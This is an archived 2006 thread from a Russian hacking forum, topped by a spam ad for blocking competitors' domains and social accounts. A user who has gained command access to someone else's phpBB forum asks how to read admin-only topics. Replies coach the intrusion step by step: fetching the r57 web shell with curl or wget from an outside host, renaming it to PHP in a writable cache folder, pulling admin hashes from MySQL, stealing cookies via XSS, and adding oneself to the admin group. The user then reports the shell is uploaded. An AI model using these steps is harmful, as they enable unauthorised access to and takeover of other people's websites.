УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
phpBB. Взял Config.php. А как дальше?

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

phpBB. Взял Config.php. А как дальше?

21.06.2006, 15:46

Cnekmp

Новичок

Регистрация: 19.02.2006

Сообщений: 16

Провел на форуме:
80773

Репутация: 0

phpBB. Взял Config.php. А как дальше?

C помощю эксплоита получил доступ к файлам форума. Работают команды cat, ls, uname, rm, echo, mkdir и т.д.

Содержимое файла config.php :

PHP код:


		
			
<?php





// phpBB 2.x auto-generated config file

// Do not change anything in this file!



$dbms = 'mysql';



$dbhost = 'localhost';

$dbname = 'xxx_forum';

$dbuser = 'xxx_forum';

$dbpasswd = 'xxx_password';



$table_prefix = 'phpbb_';



define('PHPBB_INSTALLED', true);



?>

Для меня главная цель, это посмотреть топики которые разрешены только Группе Администраторы. И ещё как подключится к базе mySQL имея данные с config.php? Сама ссылка стандартного типа: www.xxx.ru/forum/
Подскажите пожалуйсто какой должен быть следющий шаг?

21.06.2006, 15:48

DimaHbl4

Участник форума

Регистрация: 09.05.2006

Сообщений: 245

Провел на форуме:
565298

Репутация: 47

Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....

Самый простой способ лить в папку cаche, она на запись всегда разрешена. И curl почти везде есть.
Значит пробираешь pwd(узнаешь папку в которой ты находишся). И пишешь curl -o путь/cache/file.txt http://rst.void.ru/download/r57shell.txt .... А потом cp путь/cache/file.txt путь/cache/file.php , и идешь путь/cache/file.php

Все расписал подробнее нельзя.

Последний раз редактировалось DimaHbl4; 21.06.2006 в 15:55..

21.06.2006, 15:59

Cnekmp

Новичок

Регистрация: 19.02.2006

Сообщений: 16

Провел на форуме:
80773

Репутация: 0

Цитата:

Сообщение от DimaHbl4

Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....

Залить шелл командой wget ?
т.е. пример будет такого типа:

perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php"

Если да то обращение через браузер должен быть таким:

www.xxx.ru/forum/shell.php

?

команда PWD:
root@omega: pwd
--------------------------------

/usr/home/www/xxx/xxx/forum

21.06.2006, 15:59

bl4ck-cat

Познающий

Регистрация: 17.06.2006

Сообщений: 76

Провел на форуме:
263627

Репутация: 32

хм... если просто смотреть админские разделы то зачем аж так парится?

простая кся и по кукам админа заходишь

ну для могучих перцев можно и вправду залить шелл командой wget(или другой смотря что пашет) и узнавать хэш админа потом его разшифрововать.... кста а нах заливать шел чтоб лазить по мискле?
разве mysql -D -h -u -p ктонить отменял? :Р и вообще если тебе известно всё по мискле то по выше перечисленой команде можно и апдейтнуть себя и перевести в группу админов

21.06.2006, 16:03

Cnekmp

Новичок

Регистрация: 19.02.2006

Сообщений: 16

Провел на форуме:
80773

Репутация: 0

Цитата:

Сообщение от bl4ck-cat

хм... если просто смотреть админские разделы то зачем аж так парится?

простая кся и по кукам админа заходишь

В Мускуле не рабираюсь

Проблема в этом... Если можете помочь стучите в асю пожалуйто - 317570777

21.06.2006, 16:09

Cnekmp

Новичок

Регистрация: 19.02.2006

Сообщений: 16

Провел на форуме:
80773

Репутация: 0

Есть! Шелл р57 залит.

Последний раз редактировалось Cnekmp; 21.06.2006 в 16:13..

21.06.2006, 16:10

DimaHbl4

Участник форума

Регистрация: 09.05.2006

Сообщений: 245

Провел на форуме:
565298

Репутация: 47

bl4ck-cat
ТЫ гений чтоли......
Каким макаром ты подменишь куки в версиях старше 2.0.12 и станешь при этом админом?
Научи я тоже так хочу.

Cnekmp
Набери ls -l посмотри какие еще папки доступны на запись.... около них будет написано drwxrwxrwx

Последний раз редактировалось DimaHbl4; 21.06.2006 в 16:12..

21.06.2006, 16:14

Cnekmp

Новичок

Регистрация: 19.02.2006

Сообщений: 16

Провел на форуме:
80773

Репутация: 0

Теперь с помощю шелла какой шаг нужно сделать?

21.06.2006, 16:15

bl4ck-cat

Познающий

Регистрация: 17.06.2006

Сообщений: 76

Провел на форуме:
263627

Репутация: 32

Цитата:

perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php"

Если да то обращение через браузер должен быть таким:

www.xxx.ru/forum/shell.php

да, да... ну а дальше если шелл зальешь то там уже разберешся... просто найди там панель управления базой и повводи все те данные про мисклю что ты раздобыл и юзай запросы к бд... хотя имхо если тебе просто читать разделы.. то проще юзнуть ксю... помоему жалобная кся там тоже пашет как и на ипб...

#10

21.06.2006, 16:19

bl4ck-cat

Познающий

Регистрация: 17.06.2006

Сообщений: 76

Провел на форуме:
263627

Репутация: 32

Диманыч
я не говорил что можно через подмену куков сделать себя админом О_о я дал 2 способа:
подменить свои куки на куки админа и заходить как этот админ
и 2 способ через мускуль добавить себя в админ группу О_о ведь если у тебя есть все данные про бд мускуля чем бы не поизменять там чего? о_О

Последний раз редактировалось bl4ck-cat; 21.06.2006 в 16:22..

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход